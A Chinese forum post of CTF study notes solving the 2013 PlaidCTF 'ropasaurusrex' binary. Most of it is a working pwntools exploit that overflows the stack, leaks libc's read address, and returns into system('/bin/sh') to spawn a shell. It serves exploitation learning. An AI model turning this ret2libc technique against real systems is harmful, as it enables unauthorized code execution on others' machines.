-
-
[原创]PWN学习笔记【基本ROP练习】【2013-PlaidCTF-ropasaurusrex】
-
发表于:
2022-5-27 16:23
7787
-
[原创]PWN学习笔记【基本ROP练习】【2013-PlaidCTF-ropasaurusrex】
#!/usr/local/bin/python3
from pwn import *
from LibcSearcher import LibcSearcher
sh = gdb.debug('./ropasaurusrex-85a84f36f81e11f720b1cf5ea0d1fb0d5a603c0d', "b *0x804841D")
elf = ELF('./ropasaurusrex-85a84f36f81e11f720b1cf5ea0d1fb0d5a603c0d')
write_plt = elf.plt['write']
read_got = elf.got['read']
sub_80483F4 = 0x80483F4
payload = flat([
'A' * 136,
0xdeadbeef,
write_plt,
sub_80483F4,
1,
read_got,
4,
'B'*96
])
sh.send(payload)
print ("get the read addr")
libc_read_addr = u32(sh.recv()[0:4])
libc = LibcSearcher('read', libc_read_addr)
libcbase = libc_read_addr - libc.dump('read')
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')
print ("get shell")
payload = flat([
'C' * 136,
0xdeadbeef,
system_addr,
0xdeadbeef,
binsh_addr,
'D'*104
])
sh.send(payload)
sh.interactive()
通过write(1,got['read'],4)泄露read函数地址
LibcSearcher 查找libc版本,并计算system和str_bin_sh地址
重复调用sub_80483F4函数,溢出返回到system("/bin/sh")
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
